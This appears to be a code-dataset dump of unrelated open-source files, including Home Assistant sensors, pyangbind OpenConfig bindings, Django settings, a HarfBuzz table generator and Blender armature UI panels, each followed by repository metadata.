hass.data[DOMAIN][entry.entry_id][DATA_CLIENT] entities = [] if coordinator.data: if coordinator.data.electricity: for description in SENSOR_TYPES_ELECTRICITY: if ( description.key == KEY_LAST_ELECTRICITY_COST and coordinator.data.electricity[-1] is not None and coordinator.data.electricity[-1].cost is not None ): description.native_unit_of_measurement = ( coordinator.data.electricity[-1].cost.currency_unit ) entities.append(OVOEnergySensor(coordinator, description, client)) if coordinator.data.gas: for description in SENSOR_TYPES_GAS: if ( description.key == KEY_LAST_GAS_COST and coordinator.data.gas[-1] is not None and coordinator.data.gas[-1].cost is not None ): description.native_unit_of_measurement = coordinator.data.gas[ -1 ].cost.currency_unit entities.append(OVOEnergySensor(coordinator, description, client)) async_add_entities(entities, True) class OVOEnergySensor(OVOEnergyDeviceEntity, SensorEntity): """Define a OVO Energy sensor.""" coordinator: DataUpdateCoordinator entity_description: OVOEnergySensorEntityDescription def __init__( self, coordinator: DataUpdateCoordinator, description: OVOEnergySensorEntityDescription, client: OVOEnergy, ) -> None: """Initialize.""" super().__init__( coordinator, client, ) self._attr_unique_id = f"{DOMAIN}_{client.account_id}_{description.key}" self.entity_description = description @property def native_value(self) -> StateType | datetime: """Return the state.""" usage: OVODailyUsage = self.coordinator.data return self.entity_description.value(usage)
rohitranjan1991/home-assistant
homeassistant/components/ovo_energy/sensor.py
Python
mit
6,463
0.000928
""" @file test_gyro_lsm330dlc.py """ ## # @addtogroup soletta sensor # @brief This is sensor test based on soletta app # @brief test sensor lsm330dlc on Galileo/MinnowMax/Edison ## import os import time from oeqa.utils.helper import shell_cmd from oeqa.oetest import oeRuntimeTest from EnvirSetup import EnvirSetup from oeqa.utils.decorators import tag @tag(TestType="FVT", FeatureID="IOTOS-757") class TestGyroLSM330DLC(oeRuntimeTest): """ @class TestGyroLSM330DLC """ def setUp(self): '''Generate fbp file on target @fn setUp @param self @return''' print 'start!\n' #connect sensor and DUT through board #shell_cmd("sudo python "+ os.path.dirname(__file__) + "/Connector.py lsm330dlc") envir = EnvirSetup(self.target) envir.envirSetup("lsm330dlc","gyro") def tearDown(self): '''unload lsm330dlc driver @fn tearDown @param self @return''' (status, output) = self.target.run("cat /sys/devices/virtual/dmi/id/board_name") if "Minnow" in output: (status, output) = self.target.run( "cd /sys/bus/i2c/devices; \ echo 0x6b >i2c-1/delete_device") if "Galileo" in output: (status, output) = self.target.run( "cd /sys/bus/i2c/devices; \ echo 0x6b >i2c-0/delete_device") if "BODEGA" in output: (status, output) = self.target.run( "cd /sys/bus/i2c/devices; \ echo 0x6b >i2c-6/delete_device") def test_Gyro_LSM330DLC(self): '''Execute the test app and verify sensor data @fn test_Gyro_LSM330DLC @param self @return''' print 'start reading data!' (status, output) = self.target.run( "chmod 777 /opt/apps/test_gyro_lsm330dlc.fbp") (status, output) = self.target.run( "cd /opt/apps; ./test_gyro_lsm330dlc.fbp >re.log") error = output (status, output) = self.target.run( "cp /opt/apps/re.log /home/root/lsm330dlc.log") (status, output) = self.target.run("cat /opt/apps/re.log|grep direction-vector") print output + "\n" self.assertEqual(status, 0, msg="Error messages: %s" % error) #make sure sensor data is valid (status, output) = self.target.run("cat /opt/apps/re.log|grep '0.000000, 0.000000, 0.000000'") self.assertEqual(status, 1, msg="Error messages: %s" % output)
daweiwu/meta-iotqa-1
lib/oeqa/runtime/sensor/test_gyro_lsm330dlc.py
Python
mit
2,634
0.006834
# -*- coding: utf-8 -*- from operator import attrgetter from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType from pyangbind.lib.yangtypes import RestrictedClassType from pyangbind.lib.yangtypes import TypedListType from pyangbind.lib.yangtypes import YANGBool from pyangbind.lib.yangtypes import YANGListType from pyangbind.lib.yangtypes import YANGDynClass from pyangbind.lib.yangtypes import ReferenceType from pyangbind.lib.base import PybindBase from collections import OrderedDict from decimal import Decimal from bitarray import bitarray import six # PY3 support of some PY2 keywords (needs improved) if six.PY3: import builtins as __builtin__ long = int elif six.PY2: import __builtin__ from . import state from . import types_of_service class as_external_lsa(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/as-external-lsa. Each member element of the container is represented as a class variable - with a specific YANG type. YANG Description: Contents of the AS External LSA """ __slots__ = ("_path_helper", "_extmethods", "__state", "__types_of_service") _yang_name = "as-external-lsa" _pybind_generated_by = "container" def __init__(self, *args, **kwargs): self._path_helper = False self._extmethods = False self.__state = YANGDynClass( base=state.state, is_container="container", yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) self.__types_of_service = YANGDynClass( base=types_of_service.types_of_service, is_container="container", yang_name="types-of-service", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path() + [self._yang_name] else: return [ "network-instances", "network-instance", "protocols", "protocol", "ospfv2", "areas", "area", "lsdb", "lsa-types", "lsa-type", "lsas", "lsa", "as-external-lsa", ] def _get_state(self): """ Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state (container) YANG Description: State parameters for the AS external LSA """ return self.__state def _set_state(self, v, load=False): """ Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state (container) If this variable is read-only (config: false) in the source YANG file, then _set_state is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_state() directly. YANG Description: State parameters for the AS external LSA """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=state.state, is_container="container", yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) except (TypeError, ValueError): raise ValueError( { "error-string": """state must be of a type compatible with container""", "defined-type": "container", "generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""", } ) self.__state = t if hasattr(self, "_set"): self._set() def _unset_state(self): self.__state = YANGDynClass( base=state.state, is_container="container", yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) def _get_types_of_service(self): """ Getter method for types_of_service, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service (container) YANG Description: Breakdown of External LSA contents specifying multiple TOS values """ return self.__types_of_service def _set_types_of_service(self, v, load=False): """ Setter method for types_of_service, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service (container) If this variable is read-only (config: false) in the source YANG file, then _set_types_of_service is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_types_of_service() directly. YANG Description: Breakdown of External LSA contents specifying multiple TOS values """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=types_of_service.types_of_service, is_container="container", yang_name="types-of-service", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) except (TypeError, ValueError): raise ValueError( { "error-string": """types_of_service must be of a type compatible with container""", "defined-type": "container", "generated-type": """YANGDynClass(base=types_of_service.types_of_service, is_container='container', yang_name="types-of-service", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""", } ) self.__types_of_service = t if hasattr(self, "_set"): self._set() def _unset_types_of_service(self): self.__types_of_service = YANGDynClass( base=types_of_service.types_of_service, is_container="container", yang_name="types-of-service", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) state = __builtin__.property(_get_state) types_of_service = __builtin__.property(_get_types_of_service) _pyangbind_elements = OrderedDict( [("state", state), ("types_of_service", types_of_service)] ) from . import state from . import types_of_service class as_external_lsa(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa-types/lsa-type/lsas/lsa/as-external-lsa. Each member element of the container is represented as a class variable - with a specific YANG type. YANG Description: Contents of the AS External LSA """ __slots__ = ("_path_helper", "_extmethods", "__state", "__types_of_service") _yang_name = "as-external-lsa" _pybind_generated_by = "container" def __init__(self, *args, **kwargs): self._path_helper = False self._extmethods = False self.__state = YANGDynClass( base=state.state, is_container="container", yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) self.__types_of_service = YANGDynClass( base=types_of_service.types_of_service, is_container="container", yang_name="types-of-service", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path() + [self._yang_name] else: return [ "network-instances", "network-instance", "protocols", "protocol", "ospfv2", "areas", "area", "lsdb", "lsa-types", "lsa-type", "lsas", "lsa", "as-external-lsa", ] def _get_state(self): """ Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state (container) YANG Description: State parameters for the AS external LSA """ return self.__state def _set_state(self, v, load=False): """ Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/state (container) If this variable is read-only (config: false) in the source YANG file, then _set_state is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_state() directly. YANG Description: State parameters for the AS external LSA """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=state.state, is_container="container", yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) except (TypeError, ValueError): raise ValueError( { "error-string": """state must be of a type compatible with container""", "defined-type": "container", "generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""", } ) self.__state = t if hasattr(self, "_set"): self._set() def _unset_state(self): self.__state = YANGDynClass( base=state.state, is_container="container", yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) def _get_types_of_service(self): """ Getter method for types_of_service, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service (container) YANG Description: Breakdown of External LSA contents specifying multiple TOS values """ return self.__types_of_service def _set_types_of_service(self, v, load=False): """ Setter method for types_of_service, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/types_of_service (container) If this variable is read-only (config: false) in the source YANG file, then _set_types_of_service is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_types_of_service() directly. YANG Description: Breakdown of External LSA contents specifying multiple TOS values """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass( v, base=types_of_service.types_of_service, is_container="container", yang_name="types-of-service", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) except (TypeError, ValueError): raise ValueError( { "error-string": """types_of_service must be of a type compatible with container""", "defined-type": "container", "generated-type": """YANGDynClass(base=types_of_service.types_of_service, is_container='container', yang_name="types-of-service", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=False)""", } ) self.__types_of_service = t if hasattr(self, "_set"): self._set() def _unset_types_of_service(self): self.__types_of_service = YANGDynClass( base=types_of_service.types_of_service, is_container="container", yang_name="types-of-service", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace="http://openconfig.net/yang/network-instance", defining_module="openconfig-network-instance", yang_type="container", is_config=False, ) state = __builtin__.property(_get_state) types_of_service = __builtin__.property(_get_types_of_service) _pyangbind_elements = OrderedDict( [("state", state), ("types_of_service", types_of_service)] )
napalm-automation/napalm-yang
napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/as_external_lsa/__init__.py
Python
apache-2.0
19,446
0.001337
class A(B): pass class A(object): pass class A(x.y()): pass class A(B, C): pass
warner83/micropython
tests/bytecode/mp-tests/class5.py
Python
mit
96
0.03125
""" WSGI config for eyrie project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/ """ import os from django.core.wsgi import get_wsgi_application from whitenoise.django import DjangoWhiteNoise os.environ.setdefault("DJANGO_SETTINGS_MODULE", "eyrie.settings") application = get_wsgi_application() application = DjangoWhiteNoise(application)
ZeroCater/Eyrie
eyrie/wsgi.py
Python
mit
478
0
class Symbol(object): def __init__(self, num, name): pass
lodevil/pyparser
pyparser/symbol.py
Python
apache-2.0
72
0
# -*- coding: utf-8 -*- """Setup/installation tests for this package.""" from ade25.assetmanager.testing import IntegrationTestCase from plone import api class TestInstall(IntegrationTestCase): """Test installation of ade25.assetmanager into Plone.""" def setUp(self): """Custom shared utility setup for tests.""" self.portal = self.layer['portal'] self.installer = api.portal.get_tool('portal_quickinstaller') def test_product_installed(self): """Test if ade25.assetmanager is installed with portal_quickinstaller.""" self.assertTrue(self.installer.isProductInstalled('ade25.assetmanager')) def test_uninstall(self): """Test if ade25.assetmanager is cleanly uninstalled.""" self.installer.uninstallProducts(['ade25.assetmanager']) self.assertFalse(self.installer.isProductInstalled('ade25.assetmanager')) # browserlayer.xml def test_browserlayer(self): """Test that IAde25AssetmanagerLayer is registered.""" from ade25.assetmanager.interfaces import IAde25AssetmanagerLayer from plone.browserlayer import utils self.failUnless(IAde25AssetmanagerLayer in utils.registered_layers())
ade25/ade25.assetmanager
ade25/assetmanager/tests/test_setup.py
Python
mit
1,209
0.002481
# Copyright (C) 2017 Kacy Thorne # # This file is part of Clontris. # # Clontris is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Clontris is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. """This module containts project metadata. If using setuptools, then within setup.py put:: meta = {} with open(clontris/meta.py) as f: exec(f.read(), meta) Then access this module's attributes like this:: version = meta['version'] """ package_name = 'clontris' project_name = 'Clontris' version = '0.1.0-dev'
kcthrn/clontris
clontris/meta.py
Python
gpl-3.0
1,028
0
t = int(raw_input()) MOD = 10**9 + 7 def modexp(a,b): res = 1 while b: if b&1: res *= a res %= MOD a = (a*a)%MOD b /= 2 return res fn = [1 for _ in xrange(100001)] ifn = [1 for _ in xrange(100001)] for i in range(1,100000): fn[i] = fn[i-1] * i fn[i] %= MOD ifn[i] = modexp(fn[i],MOD-2) def nCr(n,k): return fn[n] * ifn[k] * ifn[n-k] for ti in range(t): n = int(raw_input()) a = map(int,raw_input().split()) ans = 0 for i in range(n): if i%2==0: ans += nCr(n-1,i)%MOD * a[i]%MOD else: ans -= nCr(n-1,i)%MOD * a[i]%MOD ans %= MOD print ans
ManrajGrover/CodeSprint_India_2014
Qualification_Round_2/Editorials/array_simp_2.py
Python
mit
683
0.030747
import sys from unicode_parse_common import * # http://www.unicode.org/Public/5.1.0/ucd/Scripts.txt script_to_harfbuzz = { # This is the list of HB_Script_* at the time of writing 'Common': 'HB_Script_Common', 'Greek': 'HB_Script_Greek', 'Cyrillic': 'HB_Script_Cyrillic', 'Armenian': 'HB_Script_Armenian', 'Hebrew': 'HB_Script_Hebrew', 'Arabic': 'HB_Script_Arabic', 'Syriac': 'HB_Script_Syriac', 'Thaana': 'HB_Script_Thaana', 'Devanagari': 'HB_Script_Devanagari', 'Bengali': 'HB_Script_Bengali', 'Gurmukhi': 'HB_Script_Gurmukhi', 'Gujarati': 'HB_Script_Gujarati', 'Oriya': 'HB_Script_Oriya', 'Tamil': 'HB_Script_Tamil', 'Telugu': 'HB_Script_Telugu', 'Kannada': 'HB_Script_Kannada', 'Malayalam': 'HB_Script_Malayalam', 'Sinhala': 'HB_Script_Sinhala', 'Thai': 'HB_Script_Thai', 'Lao': 'HB_Script_Lao', 'Tibetan': 'HB_Script_Tibetan', 'Myanmar': 'HB_Script_Myanmar', 'Georgian': 'HB_Script_Georgian', 'Hangul': 'HB_Script_Hangul', 'Ogham': 'HB_Script_Ogham', 'Runic': 'HB_Script_Runic', 'Khmer': 'HB_Script_Khmer', 'Inherited': 'HB_Script_Inherited', } class ScriptDict(object): def __init__(self, base): self.base = base def __getitem__(self, key): r = self.base.get(key, None) if r is None: return 'HB_Script_Common' return r def main(infile, outfile): ranges = unicode_file_parse(infile, ScriptDict(script_to_harfbuzz), 'HB_Script_Common') ranges = sort_and_merge(ranges) print >>outfile, '// Generated from Unicode script tables\n' print >>outfile, '#ifndef SCRIPT_PROPERTIES_H_' print >>outfile, '#define SCRIPT_PROPERTIES_H_\n' print >>outfile, '#include <stdint.h>' print >>outfile, '#include "harfbuzz-shaper.h"\n' print >>outfile, 'struct script_property {' print >>outfile, ' uint32_t range_start;' print >>outfile, ' uint32_t range_end;' print >>outfile, ' HB_Script script;' print >>outfile, '};\n' print >>outfile, 'static const struct script_property script_properties[] = {' for (start, end, value) in ranges: print >>outfile, ' {0x%x, 0x%x, %s},' % (start, end, value) print >>outfile, '};\n' print >>outfile, 'static const unsigned script_properties_count = %d;\n' % len(ranges) print >>outfile, '#endif // SCRIPT_PROPERTIES_H_' if __name__ == '__main__': if len(sys.argv) != 3: print 'Usage: %s <input .txt> <output .h>' % sys.argv[0] else: main(file(sys.argv[1], 'r'), file(sys.argv[2], 'w+'))
zcbenz/cefode-chromium
third_party/harfbuzz/contrib/tables/scripts-parse.py
Python
bsd-3-clause
2,516
0.010731
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # String literals representing core resources. ADDRESS_GROUP = 'address_group' AGENT = 'agent' FLOATING_IP = 'floatingip' LOCAL_IP_ASSOCIATION = 'local_ip_association' NETWORK = 'network' NETWORKS = 'networks' PORT = 'port' PORTS = 'ports' PORT_BINDING = 'port_binding' PORT_DEVICE = 'port_device' PROCESS = 'process' RBAC_POLICY = 'rbac-policy' ROUTER = 'router' ROUTER_CONTROLLER = 'router_controller' ROUTER_GATEWAY = 'router_gateway' ROUTER_INTERFACE = 'router_interface' SECURITY_GROUP = 'security_group' SECURITY_GROUP_RULE = 'security_group_rule' SEGMENT = 'segment' SEGMENT_HOST_MAPPING = 'segment_host_mapping' SUBNET = 'subnet' SUBNETS = 'subnets' SUBNETPOOL_ADDRESS_SCOPE = 'subnetpool_address_scope' SUBPORTS = 'subports' TRUNK = 'trunk' TRUNK_PLUGIN = 'trunk_plugin'
openstack/neutron-lib
neutron_lib/callbacks/resources.py
Python
apache-2.0
1,353
0
from decouple import Csv, config from dj_database_url import parse as db_url from .base import * # noqa DEBUG = False SECRET_KEY = config('SECRET_KEY') DATABASES = { 'default': config('DATABASE_URL', cast=db_url), } DATABASES['default']['ATOMIC_REQUESTS'] = True ALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv()) STATIC_ROOT = 'staticfiles' STATIC_URL = '/static/' MEDIA_ROOT = 'mediafiles' MEDIA_URL = '/media/' SERVER_EMAIL = 'foo@example.com' EMAIL_HOST = 'smtp.sendgrid.net' EMAIL_HOST_USER = config('SENDGRID_USERNAME') EMAIL_HOST_PASSWORD = config('SENDGRID_PASSWORD') EMAIL_PORT = 587 EMAIL_USE_TLS = True # Security SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https') SECURE_SSL_REDIRECT = True SESSION_COOKIE_SECURE = True CSRF_COOKIE_SECURE = True SECURE_HSTS_SECONDS = 3600 SECURE_HSTS_INCLUDE_SUBDOMAINS = True SECURE_CONTENT_TYPE_NOSNIFF = True SECURE_BROWSER_XSS_FILTER = True X_FRAME_OPTIONS = 'DENY' CSRF_COOKIE_HTTPONLY = True # Webpack WEBPACK_LOADER['DEFAULT']['CACHE'] = True # Celery CELERY_BROKER_URL = config('REDIS_URL') CELERY_RESULT_BACKEND = config('REDIS_URL') CELERY_SEND_TASK_ERROR_EMAILS = True # Whitenoise STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage' MIDDLEWARE.insert( # insert WhiteNoiseMiddleware right after SecurityMiddleware MIDDLEWARE.index('django.middleware.security.SecurityMiddleware') + 1, 'whitenoise.middleware.WhiteNoiseMiddleware') # django-log-request-id MIDDLEWARE.insert( # insert RequestIDMiddleware on the top 0, 'log_request_id.middleware.RequestIDMiddleware') LOG_REQUEST_ID_HEADER = 'HTTP_X_REQUEST_ID' LOG_REQUESTS = True # Opbeat INSTALLED_APPS += ['opbeat.contrib.django'] MIDDLEWARE.insert( # insert OpbeatAPMMiddleware on the top 0, 'opbeat.contrib.django.middleware.OpbeatAPMMiddleware') LOGGING = { 'version': 1, 'disable_existing_loggers': False, 'filters': { 'require_debug_false': { '()': 'django.utils.log.RequireDebugFalse' }, 'request_id': { '()': 'log_request_id.filters.RequestIDFilter' }, }, 'formatters': { 'standard': { 'format': '%(levelname)-8s [%(asctime)s] [%(request_id)s] %(name)s: %(message)s' }, }, 'handlers': { 'null': { 'class': 'logging.NullHandler', }, 'mail_admins': { 'level': 'ERROR', 'class': 'django.utils.log.AdminEmailHandler', 'filters': ['require_debug_false'], }, 'console': { 'level': 'DEBUG', 'class': 'logging.StreamHandler', 'filters': ['request_id'], 'formatter': 'standard', }, }, 'loggers': { '': { 'handlers': ['console'], 'level': 'INFO' }, 'django.security.DisallowedHost': { 'handlers': ['null'], 'propagate': False, }, 'django.request': { 'handlers': ['mail_admins'], 'level': 'ERROR', 'propagate': True, }, 'log_request_id.middleware': { 'handlers': ['console'], 'level': 'DEBUG', 'propagate': False, }, } }
camilaavilarinho/monitorador-twitter
monitortwitter/settings/production.py
Python
mit
3,261
0.000613
import sys sys.path.append("..") from deflate import fix_star_rating # The beatmap that you are checking and fixing inflated patterns for beatmap_path = "./necro.osu" # The new difficulty name (Version) of the beatmap new_difficulty_name = "star rating fix" # The output file path of the beatmap output_path = "./necro_fixed.osu" fix_star_rating(beatmap_path, new_difficulty_name, output_path)
Swan/ManiaStarReducer
test/example.py
Python
mit
398
0.005025
# ##### BEGIN GPL LICENSE BLOCK ##### # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software Foundation, # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # # ##### END GPL LICENSE BLOCK ##### # <pep8 compliant> import bpy from bpy.types import Panel, Menu from rna_prop_ui import PropertyPanel class ArmatureButtonsPanel: bl_space_type = 'PROPERTIES' bl_region_type = 'WINDOW' bl_context = "data" @classmethod def poll(cls, context): return context.armature class DATA_PT_context_arm(ArmatureButtonsPanel, Panel): bl_label = "" bl_options = {'HIDE_HEADER'} def draw(self, context): layout = self.layout ob = context.object arm = context.armature space = context.space_data if ob: layout.template_ID(ob, "data") elif arm: layout.template_ID(space, "pin_id") class DATA_PT_skeleton(ArmatureButtonsPanel, Panel): bl_label = "Skeleton" def draw(self, context): layout = self.layout arm = context.armature layout.prop(arm, "pose_position", expand=True) col = layout.column() col.label(text="Layers:") col.prop(arm, "layers", text="") col.label(text="Protected Layers:") col.prop(arm, "layers_protected", text="") if context.scene.render.engine == 'BLENDER_GAME': col = layout.column() col.label(text="Deform:") col.prop(arm, "deform_method", expand=True) class DATA_PT_display(ArmatureButtonsPanel, Panel): bl_label = "Display" def draw(self, context): layout = self.layout ob = context.object arm = context.armature layout.prop(arm, "draw_type", expand=True) split = layout.split() col = split.column() col.prop(arm, "show_names", text="Names") col.prop(arm, "show_axes", text="Axes") col.prop(arm, "show_bone_custom_shapes", text="Shapes") col = split.column() col.prop(arm, "show_group_colors", text="Colors") if ob: col.prop(ob, "show_x_ray", text="X-Ray") col.prop(arm, "use_deform_delay", text="Delay Refresh") class DATA_PT_bone_group_specials(Menu): bl_label = "Bone Group Specials" def draw(self, context): layout = self.layout layout.operator("pose.group_sort", icon='SORTALPHA') class DATA_PT_bone_groups(ArmatureButtonsPanel, Panel): bl_label = "Bone Groups" @classmethod def poll(cls, context): return (context.object and context.object.type == 'ARMATURE' and context.object.pose) def draw(self, context): layout = self.layout ob = context.object pose = ob.pose group = pose.bone_groups.active row = layout.row() rows = 1 if group: rows = 4 row.template_list("UI_UL_list", "bone_groups", pose, "bone_groups", pose.bone_groups, "active_index", rows=rows) col = row.column(align=True) col.active = (ob.proxy is None) col.operator("pose.group_add", icon='ZOOMIN', text="") col.operator("pose.group_remove", icon='ZOOMOUT', text="") col.menu("DATA_PT_bone_group_specials", icon='DOWNARROW_HLT', text="") if group: col.separator() col.operator("pose.group_move", icon='TRIA_UP', text="").direction = 'UP' col.operator("pose.group_move", icon='TRIA_DOWN', text="").direction = 'DOWN' split = layout.split() split.active = (ob.proxy is None) col = split.column() col.prop(group, "color_set") if group.color_set: col = split.column() sub = col.row(align=True) sub.enabled = group.is_custom_color_set # only custom colors are editable sub.prop(group.colors, "normal", text="") sub.prop(group.colors, "select", text="") sub.prop(group.colors, "active", text="") row = layout.row() row.active = (ob.proxy is None) sub = row.row(align=True) sub.operator("pose.group_assign", text="Assign") sub.operator("pose.group_unassign", text="Remove") # row.operator("pose.bone_group_remove_from", text="Remove") sub = row.row(align=True) sub.operator("pose.group_select", text="Select") sub.operator("pose.group_deselect", text="Deselect") class DATA_PT_pose_library(ArmatureButtonsPanel, Panel): bl_label = "Pose Library" bl_options = {'DEFAULT_CLOSED'} @classmethod def poll(cls, context): return (context.object and context.object.type == 'ARMATURE' and context.object.pose) def draw(self, context): layout = self.layout ob = context.object poselib = ob.pose_library layout.template_ID(ob, "pose_library", new="poselib.new", unlink="poselib.unlink") if poselib: # list of poses in pose library row = layout.row() row.template_list("UI_UL_list", "pose_markers", poselib, "pose_markers", poselib.pose_markers, "active_index", rows=3) # column of operators for active pose # - goes beside list col = row.column(align=True) col.active = (poselib.library is None) # invoke should still be used for 'add', as it is needed to allow # add/replace options to be used properly col.operator("poselib.pose_add", icon='ZOOMIN', text="") col.operator_context = 'EXEC_DEFAULT' # exec not invoke, so that menu doesn't need showing pose_marker_active = poselib.pose_markers.active if pose_marker_active is not None: col.operator("poselib.pose_remove", icon='ZOOMOUT', text="") col.operator("poselib.apply_pose", icon='ZOOM_SELECTED', text="").pose_index = poselib.pose_markers.active_index col.operator("poselib.action_sanitize", icon='HELP', text="") # 